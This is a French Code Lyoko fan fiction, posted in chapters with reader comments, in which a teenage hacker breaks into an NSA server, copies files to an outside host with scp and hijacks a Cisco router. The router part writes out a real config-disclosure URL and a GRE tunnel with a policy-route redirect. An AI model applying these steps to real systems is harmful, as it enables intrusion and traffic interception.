Histoire : open(/dev/lyoko, X_WRITE) = -1 EACCES (Access Denied)


Score : 7 sur 10 (7.0/10)   [2 notes]

Donner une notre :

Taille du texte :

Imprimer cette histoire

Écrite par @«»©®ø€€åýðþ le 01 octobre 2006 (4162 mots)

Dernière édition le 01 avril 2008

** Mars 1999, Nico **





- Bon, là, ça devrait marcher ... disait Nico en relançant un programme légérement modifié depuis le lamentable crash d'il y a quelque seconde.


console a écrit:



./wtf --vbig=/usr/local/lib/libssl.so /tmp/.sshagent-0



Exploiting SSL security hole in ssh-agent... Done !


# id -a


uid=0(root) gid=0(root) groups=0(root)



- r00ted, maintenant récuperer les dossiers classifié et deconnection, faut pas trop trainer sur ce serveur.


console a écrit:




Broadcast message from security@lucifer on ttyp42 at 19:30 ...


Warning ! Security Violation Detected !


Please backup your files and disconnect NOW !


System is going to shutdown in 20 seconds !





- M detecté ! Recuperer ce que je peux ...



console a écrit:



# scp /priv/data/* hehe@zoom.ps4net17.com:/opt/cstrike/datas/


Broadcast message from root@lucifer on ttyp0 at 19:30 ...


System is going to shutdown in 5 seconds !



# Connection reset by peer


ssh: Connection reset by peer


hehe@zoom:/opt/cstrike/datas/$ ls


<...>


project-carthage.tar.bz2


project-xanadu.tar.bz2


<...>






- Vite, migrer ces données ...


20 minutes plus tard, l'ensemble des fichiers etait sur le disque dur de l'ordinateur portable de Nico, dans une partition crypté.


Nico déconnecta son modem acoustique de la cabine téléphonique, rangea son materiel et s'en alla aprés avoir effaçait toute traces de sa presence.





** De nos jours, Lyokonautes**





C'etait la rentré des classes au lycée, aprés le speech toujours aussi navrant du proviseur, ce fut la recreation.



Il y avait des nouveaux éléves.


Les lyokonautes s'etait retrouvé à coté d'un banc.


- Passé de bonne vacance Jéremi ? demanda Ulrich à un Jéremie penché sur son ordinateur portable.


- J'ai fais la maintenance du SC avec Aelita et on a decouvert de vieux programmes appartenant à Franz Hopper. Je ne sais pas encore ce que c'est exactement mais j'espere bien le decouvrir. dit rapidement Jeremie en levant à peine les yeux de son écran.


- En tous cas, il n'y a pas que toi qui est accro. dit Odd en regardant un des nouveaux eleves avec son ordinateur portable ouvert et qui semblait trés concentré par ce qu'il voyait.


Brusquement, il les regarda puis la recreation pris fin.





** ..., Nico **





- Enfin la recré, je tenais plus !


Nico sortit son ordinateur portable, le sortit de vieille et lança iwlist scan


Une longue liste apparues dans le shell mais une entrée attira son attention.


console a écrit:



Cell 01 - Address: 02:03:05:07:11:13



ESSID:"xanadu"


Mode:Master


Frequency:2.462 GHz (Channel 11)


Signal level:-55 dBm Noise level:-88 dBm


Encryption key:on





- 02:03:05:07:11:13 ? Mais c'est la séquence de, Nico ne finit pas sa phrase, trop occupai a configurer airodump qui lui fit une autre surprise.


2 autres machine dont une trés proche de lui était connecté à xanadu.



Nico chercha d'autre personnes ayant un ordinateur portable et repéra un groupe d'eleves affalé sur un banc.


La cloche sonna, il poussa un soupir puis se dirigea vers la salle de cour.





** Quelque heures de cour plus tard, Aelita,Jeremie,Nico **





Aelita et Jeremie sortir de cour et allérent à l'usine.


Derriére eux, Nico les suivaient.





A mesure que Nico s'approchait de l'anciene usine Renaut, son ordinateur portable capté de mieux en mieux l'AP ayant l'adresse MAC 02:03:05:07:11:13.



Il vit Jéremie & Aelita qui descendait par un accenseur.


- Pas question d'utiliser l'ascenceur donc je vais encore joué à James Bond pensa Nico.


Il sortit de son sac son equipement d'escalade et commença à descendre en utilisant le cable.


Quand il fut suffisant proche du toit de la cabine, il sauta dessus.


Malheuresement, à ce moment Jeremie, ayant decidé d'aller examiner les scanner, appuya sur le bouton pour descendre.


Nico se retrouva dans le vide.


- Bon c'est pas grave, je vais me balancer pour atteindre l'autre coté.



Aprés 2-3 minutes de mouvements, il s'accrocha et declenchant l'ouverture de la porte, entra dans la salle.


- Et M, Xanadu....


Il s'approcha des écrans et ouvrit un shell.


À ce moment là, un programme nommé SuperScan afficha une alerte.


- Tour activée, oops Xana ...


Nico tapa vite des commandes sur la console, ouvrit un fichier sur son ordinateur portable et commença une partie de hack ...


- Les tours sont generé par un prog qui ecris et lit le fichier /apps/lyoko/var/state.db et je peux ecrire dessus.


Si je réecrit le fichier, est-ce que ...



Non, le prog fait des checks d'integrités ...


A ce moment là, l'oeil de Nico tomba sur une partie «Gestion des Utilisateurs» et tenta machinalement de lister les utilisateurs connecté.


console a écrit:



SC> show user * summary



10 years, 4 months, 13 days, 21:11:03 up 6:57, 91 users, load average: 16,19, 8,11, 9,09


USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT


xana pte/6 0.00s 0.02s 0.00s /usr/xana/bin/attack


franz pte/21 - 10 years, 4 months, 13 days, 21:00 14.24s 0.00s 0.00s /sys/bin/gest


root pts/0 - - - - -





- Mais screen est suid ...


Il appella screen -r et eue un joli prompt root.



Il killa tout les processus de pte/6 et le SuperScan signala que la tour se désactiva.


- Piouf ...


- Qui êtes-vous ? dit une voie derriére lui.


Nico regarda derriére lui et vis Jéremie et Aelita qui n'était pas vraiment content de le voir.


- Qu'avait vous fait ?


A ce moment là, un message d'erreur apparut sur l'ecran.






** Salle de Controle du SC, Nico, Aelita & Jeremie **





Nico se tourna immédiatement vers la console.


console a écrit:



ALERT! ALERT! ALERT!



Cannot connect to message bus system!


Warning: inconsistency detected in Lyoko!


=====> ASSERT FAILED at 0x2ffac9b3 !


=====> ASSERT FAILED at 0x82145de !









Toutes les secondes, un ASSERT FAILED s'inscrivait dans la console.


Jérémie poussa Nico et tapa comme un acharné sur le clavier.





- Mais vous avez désactivé Xana !


- Oui, mais on dirait que le système en a besoin.





A ce moment là, Aelita tomba dans le coma.


Jerémie la rattrapa avant qu'elle ne touche le sol et tenta de la réanimer.





Nico se mit devant la console, cliqua sur la fenêtre qu'il avait utiliser pour killer Xana et trouva le script qui avait initialisé pour la première fois Xana dans le répertoire de root puis le lança.


Des centaines de messages d'erreurs s'affichèrent mais les ASSERT FAILED arrêtèrent de se produire.





- Piouf ! Aelita va bien ?


- Son coeur bat et elle respire. Mais maintenant qui êtes vous ?


- Nico. Pourquoi avez-vous réactivé ce SC ?


- J'étais curieux et après que j'ai connu Aelita, je ne pouvais plus le désactiver.






Discrètement Jeremie s'était rapproché de la console et avait lancé la procédure de retour dans le passé.


- Eh !


Nico n'eut pas le temps de finir sa phrase, le retour dans le passé se produisit.





** Janvier 2000, Nico **





Nico avait extrait les fichiers les fichiers qu'il avait «emprunté» à la NSA.


La plupart évoquai de sombres histoires de manipulation qui lui faisait froid dans le dos.


Mais dés qu'il pris connaissance de project-xanadu.tar.bz2, il fut surpris.



«Un super-calculateur quantique ? Un monde virtuel avec immersion complète ? Mais c'est génial ! » pensa-t-il avant de se lancer dans l'étude approfondis des fichiers.





Il y avait des formules qui était bien au-delà de son niveau en mathématique et en physique par contre il y avait du code source et des échanges de mail.





Il trouva aussi un fichier crypté par PGP.


Nico n'avait pas envie d'attendre quelque milliards d'année pour ouvrir un fichier alors il replongea dans l'étude du code quand il se rappela brusquement une faille touchant un algo de PGP.





Il retrouva un lien vers l'article sur LinuxFR, écrivis un script et le lança.



Quelque minutes après, une archive tar.bz2 fut extraite.





Les fichiers de l'archives appartenait à un certain f.hopper.


«f.hopper ... Franz Hopper. Le concepteur de Lyoko.» réalisa-t-il.





Parmi les nombreux répertoires extraient, il trouva les notes d'Hopper sur la prochaine evolution de Lyoko.





Soudain, un message d'alerte lui signala quelqu'un tentait de remonter sa chaîne de relais.



«Et m ! Une macro piége dans ce p de document Word.»





Nico lança l'auto-destruction de plusieurs de ses relais, éteignis en urgence sa machine et changea encore une fois d'identité.






*** , Nico, ***





Nico flottait dans le noir.


«Heu ... Pourquoi j'ai l'impression que ca va empirer ?»





Soudain, un environnement commença à apparaitre.


Nico atterit sur une plateforme ronde.





Devant lui, des centaines de boules lumineuse de differents couleurs passait dans tous les sens.



Nico s'approcha du bord de la plateforme et un shell apparut devant lui.





shell a écrit:



Dev Access -- Do Not Use In Production !


login:/>









Nico sourit et pensa «Ah combien de fois j'ai vu ce Do Not Use In Production !».





Il commença à utiliser le shell pour se renseigner sur le fonctionnement du systéme.


C'etait une vielle Sun Ultra Enterprise tournant sous Solaris manifestement connecté à un réseau privé.


Listant la configuration ipv4, il decouvrit que la machine n'avait pas de gateway et pas de dns.


Le log de connection ne contenait aucune connection récente à part une entrée signalant le lancement d'une invite de connection.



En faite, les logs du systéme etait casiment vide malgrés un uptime important.


Il se loggua dans le compte root aprés 2 essai de mot de passe courant.


« Aucun fichier utilisateur, un historique de commande casi vide, un mot de passe courant pour le compte root. Mais un firewall configuré, un mininum de services lancé. Ca ressemble à un serveur dont la configuration a été interrompuse.»





Tentant un ping broadcast, Nico decouvrit une autre machine sur 10.235.71.113.


«02:03:05:07:11:13 encore une fois. C'est fou comme je retrouve cette séquence en ce moment. » pensa-t-il.





Il lista le contenu du dossier /root et eue une surprise:


shell a écrit:




root:~> find


.ssh


.ssh/known_hosts


.ssh/id_dsa


.ssh/id_dsa.pub


.ssh/config


root:~> cat .ssh/config



Host 10.235.71.113


CheckHostIP yes


StrictHostKeyChecking yes


Port 22


Protocol 2


SendEnv LANG LC_*



HashKnownHosts yes


User f.hopper





« Il y avait un serveur ssh2 sur 10.235.71.113 avec un utilisateur f.hopper et où on pouvait se via une clef publique.» Decoda-t-il. « Peut-on encore s'y logguer ?»





shell a écrit:




root:~> ssh 10.235.71.113


Last login: Tuesday, 31 December 1996 23:59:59 from 150.177.2.193


SC>








«Je me disais bien que je ne devais pas être loin du SC.» s'exclama Nico.



Il utilisa ssh pour se logguer sur un serveur de shell gratuit.





shell a écrit:



SC> ssh -l qwerty1 st0rage.org



The authenticity of host 'ssh.unhandledexceptions.com (69.128.116.234)' can't be established.


RSA key fingerprint is 43:97:d3:0b:a0:46:9a:b0:11:e8:33:45:2f:25:cd:cd.


Are you sure you want to continue connecting (yes/no)? yes


Warning: Permanently added 'ssh.unhandledexceptions.com' (RSA) to the list of known hosts.


Password:


Linux ssh.unhandledexceptions.com 2.4.26-1-386 #1 Tue Aug 24 13:31:19 JST 2004 i686





Please behave yourself.






Rules:





1) No running sevices, unless you have permission from Termina. This includes irc bots, vnc, etc.





2) IRC clients are allowed. No EggDrop/bots allowed.





3) Do not attempt to view/access files belonging to other users.





4) Report any problems you find immediatly to termina@gmail.com





5) Any abuse (.plan, etc) will result in immediate account deletion, and IP ban from both site and IRC.





Thanks for your understanding





Last login: Thu Apr 26 10:40:19 2007 from mail.boursorama.fr



qwerty1@ssh:~$ finger qwerty1


Login: qwerty1 Name:


Directory: /home/qwerty1 Shell: /bin/bash


On since Thu Apr 26 10:42 (CDT) on pts/28 from 0.2.3.5


2 seconds idle


No mail.


No plan.



qwerty1@ssh:~$ host 150.177.2.193


193.2.177.150.in-addr.arpa domain name pointer m830w193.ftmeade.army.mil.





« Bon, la liaison vers Internet fonctionne, SSH est autorisé en sortie.


Par contre les anomalies s'accumulent:


- l'ip est totalement fantaisiste et non routable sur Internet.


- Franz Hopper s'est loggué sur le SC d'appartir une machine de la NSA alors qu'il les avait aux trouses ...» dit tout haut Nico.






«Bon travail de déduction jeune homme !» entendit Nico derriére lui.


Il se retourna lentement et decouvrit un amas de lumiére.


- Mr Franz Hopper je suppose ?


- A votre avis ?





«Oula, ca commence bien» se dit Nico






** ..., ... ***

- Vu où je me trouve, la réponse est probablement oui mais vu les circonstances de mon arrivé, il valait mieux acquerir des données plus ou moins fiable.
Cela étant possé, pourquoi m'avoir amené ici ?
- Vous avez failli planter le SC et me tuer au passage!
Et vous avez le culot de me demander pourquoi ?
- Oui. Donc pourquoi ?
- Parce que je veux savoir qui vous êtes.
Vous avez utiliser des commandes et des clefs qui ne sont connus que de moi seul.
- Celle que décrit votre journal ?
- Où avez trouver ce fichier et comment l'avez vous ouvert ?
- Sur un serveur de la NSA il y a quelque année. Et puis vous aviez utilisé un alglo foireux de PGP donc la clef privé a été vite cassée.



Nico regarda de nouveau la console qui affiché toujours le qwerty1@ssh:~$.
Mettant au défi Franz Hopper de dire quelque chose, il coupa la connection au SC et commença à se bidouiller un compte.

- On ne vous a jamais dit que c'etait impoli de créé des comptes surtout ayant des priviléges administrateurs sur des machines qui ne vous appartiennent pas.
- Déformation professionnel.
- De toute façon, cela va etre effacé ...
- Pas encore un retour vers le passé !
- J'ai suspendus le précedant pour vous parler mais l'équipement ne va pas pouvoir continuait longtemps dans cet état. Et vous ne chercherai plus a acceder à Xanadu. Retour dans le passé !

Pendant que Franz Hopper parlait, Nico avait rétablis une liaison SSH avec le SC sans se faire remarquer.
Il s'ajouta à la liste des personnes à qui il fallait preserver la mémoire et lanca un petit processus discret.
Il venait juste de terminer de taper lorsque la bulle blanche l'engloba.

** Le matin du jour d'avant la rentrée, Nico **

Nico se retrouva devant son ordinateurs portable, dans son QG, le matin de la rentrée des classes.
Il réflechis quelques secondes à ce qui venait de se passer puis pris une décision.
«Je n'aime pas quand on tente de modifier ma memoire Mr Hopper. Et si je veut participer a votre jeux qui est plutôt dangereux pour le monde, vous ne pourrez pas m'en empecher.»

Trés vite, il acceda a une machine du rectorat puis utilisant le VPN servant à l'administration à distance du firewall/serveur proxy, il se loggua dans une des machines de l'administration du collége Kadic et changea son affectation:
«Je change de classe et je me met dans celle de Jeremy. »

Il se deconnecta quelques minutes plus tard.

Il chercha dans son foutoir un Soekris, vida rapidement la carte Flash et y installa un OS minimal.
Il passa quelque minutes a monter dedans une carte ethernet un peu spécial puisque supportant des débit de l'ordre des 10Gb/s en faisant trés peu travailler le CPU.
Il l'alluma, installa quelques programmes, pré-configura une suite d'utilitaire, le script de démarrage et adapta la configuration du firewall.
Il atteignit la machine et la mis dans un sac avec quelque cables, des tournevis et de l'adhésif double face.

«Rock'n'roll !» se dit-il en sortant du QG et en prenant la direction de l'usine.

--

Quelque termes:

<*>VPN: Virtual Private Network Ou Réseau Privé Virtuel: Cela permet de créé une pseudo LAN entre des machines connecté à Internet et situé à des endroits different. Les liaisons entre les differentes machines de la pseudo-LAN sont sécurisé.
<*>Soekris: C'est le nom d'une marque de carte mére permettant de construire des equipements comme des routeurs, bornes WIFI, firewall, NAS, etc.. dans de petit boitiers et consommant peu.













** Vers Midi, Nico**

Nico arrivait en vue de l'usine quand il vit Jérémie sortir de l'usine avec Aelita.
Il se cacha et tenta d'ecouter leur discution:
« Non, je ne sais pas qui était ce Nico. Je vais voir dans les fichiers du collège ce que je peut trouver.
- En tous cas, il semble connaitre le SC et Lyoko. Malgrés le retour dans le passé, il peut être dangereux.
Tu as bien fait de verrouiller l'ascenseur.»
Ils passerent sans voir Nico qui pensait «dangereux pour qui ?» et sortirent de son champ visuel.

Nico entra dans l'usine et sans surprise constata qu'il ne pouvait ouvrir la porte de l'ascenseur.
«Bon reflechissons, je peut pas passer par là. Et il n'y a que dans les films que le systéme d'aeration est suffisant grand pour laisser passer une personne.»
Soudain, il se rendit compte qu'il y avait forcement un passage d'entretien en cas de panne de l'ascenseur.
Il commença à en chercher des traces, finit par trouver une trappe, l'ouvrit et son visage s'orna d'un sourire: il y avait une echelle de barreau !
Il sortit sa lampe de torche et descendit.

Quelque dizaine de mètre plus bas, il ouvrit une autre trappe et tomba dans une salle noir eclairé par des leds verte de different appareils.
Eclairant les differents appareils avec sa lampe de torche, il commença à déterminer leur fonction.
«Un routeur cisco 7200, du cable cat5 qui part vers quelque part, ha c'est la Sun Ultra Entreprise dans laquel Hopper m'avait piége !»

Il brancha son laptop sur un port RJ-45, recupera une IPv4 par DHCP, lança nmap contre le routeur et vit que le routeur avait le serveur HTTP actif.
Ouvrant Firefox, il atteignit le router par son addresse 10.235.71.1 et tenta de recupéré l'URL /99/exec/-/show/config.
Une longue page s'ouvrit, devoilant la configuration du routeur dont son mot de passe enable.
Il lança un rapide telnet, se loggua en tant qu'admin, fais enable et faut recompenser par un prompt cisco#

Il sortit son Soekris, trouva une prise, la brancha au routeur et attendis quelque instant.
Dans la fenêtre telnet,une ligne signala l'attribution d'une nouvelle addresse IPv4 par DHCP.
Il s'y connecta en ssh2 via sa clef publique et reconfigura la machine en addresse ipv4 statique, chargea le module gre dans le kernel et se frotta les mains.
«Je connais un chouette hack avec GRE. On va voir si ca passe »


Routeur cisco à dit :

cisco#conf t
Enter configuration commands, one per line. End with CNTL/Z.
cisco(config)#int tunnel0
cisco(config-if)#desc Nico was here.
cisco(config-if)#ip address 1.1.1.1 255.255.255.0
cisco(config-if)#tunnel source eth0
cisco(config-if)#tunnel dest 10.235.71.142
cisco(config-if)#tunnel mode gre ip
cisco(config-if)#exit
cisco(config)#


«Donc voila, j'ai créé un tunnel GRE vers la Soekris qui est en 10.235.71.142. Sur ce tunnel, le routeur aura l'IPv4 1.1.1.1.
Il faut que je configure la Soekris ...»
Quelque ligne de ifconfig plus tard, il tenta de pinger sa Soekris à travers le tunnel GRE:

Routeur cisco à dit :

cisco#ping 1.1.1.2
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.2, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 8/8/8 ms


«Maintenant, ne pas casser le routage quand on va activer ce hack .»
Quelque ligne de plus en root plus tard, la Soekris routa tout ce qui lui arrivait sur le tunnel GRE vers l'addresse IPv4 1.1.1.1.

«Plus que 3 truc à faire: une regle firewall qui autorise tout, un route-map vers le tunnel GRE et l'affectation de ce route-map à l'interface qui communique avec le SC.»

Routeur cisco à dit :

cisco(config)#access-list 123 permit tcp any any
cisco(config)#route-map nicohack
cisco(config-route-map)#match ip address 123
cisco(config-route-map)#set ip next-hop 1.1.1.2
cisco(config-route-map)#exit
cisco(config)#int eth0
cisco(config-if)#ip policy route-map nicohack
cisco(config-if)#exit
cisco(config)#exit


«Bon maintenant, l'instant de vérité !» se dit Nico en tapant le dernier exit.
Route-map disant au routeur d'ignorer tout ce qu'il savait du routage pour envoyer tout le traffic sur une addresse Ipv4, la Soekris commença a recevoir du traffic et en transmettre.

Il relança les different scripts qu'il avait ecris sur la Soekris, verifia qu'elle était bien inseré dans son VPN et commença en rangé son matériel.

Quelque dizaine de minutes plus tard, il avait finis et commençait la remonté vers la surface.
Il sortit de l'usine et evita de peu la rencontre avec Jérémie.

«Je devrait arreter de jouer avec ma chance» se dit-il avant que rentrait à son QG.


@«»©®ø€€åýðþ
01/10/06 à 17:54
** Mars 1999, Nico **

- Bon, là, ça devrait marcher ... disait Nico en relançant un programme légérement modifié depuis le lamentable crash d'il y a quelque seconde.
"console" a écrit :

[www-data@lucifer.nsa.gov /tmp] ./wtf --vbig=/usr/local/lib/libssl.so /tmp/.sshagent-0
Exploiting SSL security hole in ssh-agent... Done !
# id -a
uid=0(root) gid=0(root) groups=0(root)

- r00ted, maintenant récuperer les dossiers classifié et deconnection, faut pas trop trainer sur ce serveur.
"console" a écrit :

Broadcast message from security@lucifer on ttyp42 at 19:30 ...
Warning ! Security Violation Detected !
Please backup your files and disconnect NOW !
System is going to shutdown in 20 seconds !

- M<BIIIIIIIIIIIIIIIP> detecté ! Recuperer ce que je peux ...
"console" a écrit :

# scp /priv/data/* hehe@zoom.ps4net17.com:/opt/cstrike/datas/
Broadcast message from root@lucifer on ttyp0 at 19:30 ...
System is going to shutdown in 5 seconds !
# Connection reset by peer
ssh: Connection reset by peer
hehe@zoom:/opt/cstrike/datas/$ ls
<...>
project-carthage.tar.bz2
project-xanadu.tar.bz2
<...>

- Vite, migrer ces données ...
20 minutes plus tard, l'ensemble des fichiers etait sur le disque dur de l'ordinateur portable de Nico, dans une partition crypté.
Nico déconnecta son modem acoustique de la cabine téléphonique, rangea son materiel et s'en alla aprés avoir effaçait toute traces de sa presence.

** De nos jours, Lyokonautes**

C'etait la rentré des classes au lycée, aprés le speech toujours aussi navrant du proviseur, ce fut la recreation.
Il y avait des nouveaux éléves.
Les lyokonautes s'etait retrouvé à coté d'un banc.
- Passé de bonne vacance Jéremi ? demanda Ulrich à un Jéremie penché sur son ordinateur portable.
- J'ai fais la maintenance du SC avec Aelita et on a decouvert de vieux programmes appartenant à Franz Hopper. Je ne sais pas encore ce que c'est exactement mais j'espere bien le decouvrir. dit rapidement Jeremie en levant à peine les yeux de son écran.
- En tous cas, il n'y a pas que toi qui est accro. dit Odd en regardant un des nouveaux eleves avec son ordinateur portable ouvert et qui semblait trés concentré par ce qu'il voyait.
Brusquement, il les regarda puis la recreation pris fin.

** ..., Nico **

- Enfin la recré, je tenais plus !
Nico sortit son ordinateur portable, le sortit de vieille et lança iwlist scan
Une longue liste apparues dans le shell mais une entrée attira son attention.
"console" a écrit :

Cell 01 - Address: 02:03:05:07:11:13
ESSID:"xanadu"
Mode:Master
Frequency:2.462 GHz (Channel 11)
Signal level:-55 dBm Noise level:-88 dBm
Encryption key:on

- 02:03:05:07:11:13 ? Mais c'est la séquence de, Nico ne finit pas sa phrase, trop occupai a configurer airodump qui lui fit une autre surprise.
2 autres machine dont une trés proche de lui était connecté à xanadu.
Nico chercha d'autre personnes ayant un ordinateur portable et repéra un groupe d'eleves affalé sur un banc.
La cloche sonna, il poussa un soupir puis se dirigea vers la salle de cour.

** Quelque heures de cour plus tard, Aelita,Jeremie,Nico **

Aelita et Jeremie sortir de cour et allérent à l'usine.
Derriére eux, Nico les suivaient.

A mesure que Nico s'approchait de l'anciene usine Renaut, son ordinateur portable capté de mieux en mieux l'AP ayant l'adresse MAC 02:03:05:07:11:13.
Il vit Jéremie & Aelita qui descendait par un accenseur.
- Pas question d'utiliser l'ascenceur donc je vais encore joué à James Bond pensa Nico.
Il sortit de son sac son equipement d'escalade et commença à descendre en utilisant le cable.
Quand il fut suffisant proche du toit de la cabine, il sauta dessus.
Malheuresement, à ce moment Jeremie, ayant decidé d'aller examiner les scanner, appuya sur le bouton pour descendre.
Nico se retrouva dans le vide.
- Bon c'est pas grave, je vais me balancer pour atteindre l'autre coté.
Aprés 2-3 minutes de mouvements, il s'accrocha et declenchant l'ouverture de la porte, entra dans la salle.
- Et M<BIIIIIIIIIIIIIIIP>, Xanadu....
Il s'approcha des écrans et ouvrit un shell.
À ce moment là, un programme nommé SuperScan afficha une alerte.
- Tour activée, oops Xana ...
Nico tapa vite des commandes sur la console, ouvrit un fichier sur son ordinateur portable et commença une partie de hack ...
- Les tours sont generé par un prog qui ecris et lit le fichier /apps/lyoko/var/state.db et je peux ecrire dessus.
Si je réecrit le fichier, est-ce que ...
Non, le prog fait des checks d'integrités ...
A ce moment là, l'oeil de Nico tomba sur une partie «Gestion des Utilisateurs» et tenta machinalement de lister les utilisateurs connecté.
"console" a écrit :

SC> show user * summary
10 years, 4 months, 13 days, 21:11:03 up 6:57, 91 users, load average: 16,19, 8,11, 9,09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
xana pte/6 [UNKNW] [UNKNW] 0.00s 0.02s 0.00s /usr/xana/bin/attack
franz pte/21 - 10 years, 4 months, 13 days, 21:00 14.24s 0.00s 0.00s /sys/bin/gest
root pts/0 - - - - - [screen]

- Mais screen est suid ...
Il appella screen -r et eue un joli prompt root.
Il killa tout les processus de pte/6 et le SuperScan signala que la tour se désactiva.
- Piouf ...
- Qui êtes-vous ? dit une voie derriére lui.
Nico regarda derriére lui et vis Jéremie et Aelita qui n'était pas vraiment content de le voir.
- Qu'avait vous fait ?
A ce moment là, un message d'erreur apparut sur l'ecran.


=> La suite quand je pourrai :)
J'ai juste mis en place la situation de départ.
Aucun serveur n'a été blessé pendant l'ecriture de cette partie :P

Playermaniac.net
03/04/07 à 01:29
L'iddé de cette fiction est pas mal du tout, sauf qu'elle est un peut trop technique! Il faudrait juste mettre le nécessaire mais ne pas embrouiller l'histoire avec trop de codes et de thermes informatiques!

@«»©®ø€€åýðþ
23/04/07 à 10:12
** Salle de Controle du SC, Nico, Aelita & Jeremie **

Nico se tourna immédiatement vers la console.
"console" a écrit :

ALERT! ALERT! ALERT!
Cannot connect to message bus system!
Warning: inconsistency detected in Lyoko!
=====> ASSERT FAILED at 0x2ffac9b3 !
=====> ASSERT FAILED at 0x82145de !


Toutes les secondes, un ASSERT FAILED s'inscrivait dans la console.
Jérémie poussa Nico et tapa comme un acharné sur le clavier.

- Mais vous avez désactivé Xana !
- Oui, mais on dirait que le système en a besoin.

A ce moment là, Aelita tomba dans le coma.
Jerémie la rattrapa avant qu'elle ne touche le sol et tenta de la réanimer.

Nico se mit devant la console, cliqua sur la fenêtre qu'il avait utiliser pour killer Xana et trouva le script qui avait initialisé pour la première fois Xana dans le répertoire de root puis le lança.
Des centaines de messages d'erreurs s'affichèrent mais les ASSERT FAILED arrêtèrent de se produire.

- Piouf ! Aelita va bien ?
- Son coeur bat et elle respire. Mais maintenant qui êtes vous ?
- Nico. Pourquoi avez-vous réactivé ce SC ?
- J'étais curieux et après que j'ai connu Aelita, je ne pouvais plus le désactiver.

Discrètement Jeremie s'était rapproché de la console et avait lancé la procédure de retour dans le passé.
- Eh !
Nico n'eut pas le temps de finir sa phrase, le retour dans le passé se produisit.

** Janvier 2000, Nico **

Nico avait extrait les fichiers les fichiers qu'il avait «emprunté» à la NSA.
La plupart évoquai de sombres histoires de manipulation qui lui faisait froid dans le dos.
Mais dés qu'il pris connaissance de project-xanadu.tar.bz2, il fut surpris.
«Un super-calculateur quantique ? Un monde virtuel avec immersion complète ? Mais c'est génial ! » pensa-t-il avant de se lancer dans l'étude approfondis des fichiers.

Il y avait des formules qui était bien au-delà de son niveau en mathématique et en physique par contre il y avait du code source et des échanges de mail.

Il trouva aussi un fichier crypté par PGP.
Nico n'avait pas envie d'attendre quelque milliards d'année pour ouvrir un fichier alors il replongea dans l'étude du code quand il se rappela brusquement une faille touchant un algo de PGP.

Il retrouva un lien vers l'article sur LinuxFR, écrivis un script et le lança.
Quelque minutes après, une archive tar.bz2 fut extraite.

Les fichiers de l'archives appartenait à un certain f.hopper.
«f.hopper ... Franz Hopper. Le concepteur de Lyoko.» réalisa-t-il.

Parmi les nombreux répertoires extraient, il trouva les notes d'Hopper sur la prochaine evolution de Lyoko.

Soudain, un message d'alerte lui signala quelqu'un tentait de remonter sa chaîne de relais.
«Et m<biiiiiiiiiiiiiiiip> ! Une macro piége dans ce p<biiiiiiiiiiiiiiiiiiiip> de document Word.»

Nico lança l'auto-destruction de plusieurs de ses relais, éteignis en urgence sa machine et changea encore une fois d'identité.

==> Cette partie là a été écrite il y a quelques semaines mais Abiword crasha lors de la sauvegarde.
Aujourd'hui, j'ai retrouvé des morceau de ce texte dans le swap de ma machine et j'ai réécris ce qui manquait.
==> Bon là, il y a quelque serveur qui ont souffert.
Paix à ton âme Xavia. Et bienvenu st0rage :)

Artémis
23/04/07 à 10:32
C'est...informatique lol!!!!
Comme le dit Playermaniac.net, on a l'impression d'assister à une scène où Hopper fait son journal...c'est trop technique...on y comprends rien...
pour le reste, bah..la narration est pas mal...
désolée, c'est tout ce que je peux écrire...!! :?

@«»©®ø€€åýðþ
23/04/07 à 11:06
D'accord je résume en donnant des explications:

Au début, Nico utilise une faille pour télécharger beaucoup de fichier sur un serveur de la NSA.
Il se fait detecté trés rapidement mais arrivent quand même à recuperer des fichiers concernant carthage.

Quelque années plus tard, il est au collége Cadic et repere que un AP wifi qui lui rappelle ce qu'il a lut.
Il s'aperçoit que Jeremie est connecté à ce réseau et le suit.

Ils arrivent à l'usine, Nico voit Xana activé une tour et tente de désactiver via la console.
Il trouve que l'utilisateur root (super-utilisateur/administratreur) a ouvert une session via screen et grace à des permission erroné, il accéde à cette session.
Il tue tout les processus appartenant à Xana et déstabilise le SC.

Jeremie arrive, Aelita tombe dans un coma profond, Nico trouve le script qui a permis la création initial de Xana dans le répertoire de root.
Il le lance et pendant qu'il s'approche d'Aelita pour voir si elle récuperer, Jeremie lance un retour vers le passé.

Flashback: Nico plus jeune etudie ce qu'il a recupéré chez la NSA.
Il utilise un probléme dans PGP (Pretty Good Encryption (oops)) qui réduit la securité du cryptage et arrive donc à decompresser des fichiers appartenant à Franz Hopper en quelques minutes au lieu de quelque milliard d'annés.

Malheuresement pour lui, il a ouvert un fichier Word qui contenait une macro qui communique avec la NSA.
Mais comme sa machine a une configuration un peu particuliere, la communication est passé par une chaine de relais (des serveurs compromis) ce qui cache sa veritable identité.

Le programme de relais sur un hôte compromis lui signale une intrusion et il comprend qu'il va avoir un probléme.
Il detruit donc quelques serveurs relais histoire d'effacer ces traces et se fait discret pour un moment.

@«»©®ø€€åýðþ
26/04/07 à 17:35
*** [Erreur], Nico, [Erreur] ***

Nico flottait dans le noir.
«Heu ... Pourquoi j'ai l'impression que ca va empirer ?»

Soudain, un environnement commença à apparaitre.
Nico atterit sur une plateforme ronde.

Devant lui, des centaines de boules lumineuse de differents couleurs passait dans tous les sens.
Nico s'approcha du bord de la plateforme et un shell apparut devant lui.

"shell" a écrit :

Dev Access -- Do Not Use In Production !
login:/>


Nico sourit et pensa «Ah combien de fois j'ai vu ce Do Not Use In Production !».

Il commença à utiliser le shell pour se renseigner sur le fonctionnement du systéme.
C'etait une vielle Sun Ultra Enterprise tournant sous Solaris manifestement connecté à un réseau privé.
Listant la configuration ipv4, il decouvrit que la machine n'avait pas de gateway et pas de dns.
Le log de connection ne contenait aucune connection récente à part une entrée signalant le lancement d'une invite de connection.
En faite, les logs du systéme etait casiment vide malgrés un uptime important.
Il se loggua dans le compte root aprés 2 essai de mot de passe courant.
« Aucun fichier utilisateur, un historique de commande casi vide, un mot de passe courant pour le compte root. Mais un firewall configuré, un mininum de services lancé. Ca ressemble à un serveur dont la configuration a été interrompuse.»

Tentant un ping broadcast, Nico decouvrit une autre machine sur 10.235.71.113.
«02:03:05:07:11:13 encore une fois. C'est fou comme je retrouve cette séquence en ce moment. » pensa-t-il.

Il lista le contenu du dossier /root et eue une surprise:
"shell" a écrit :

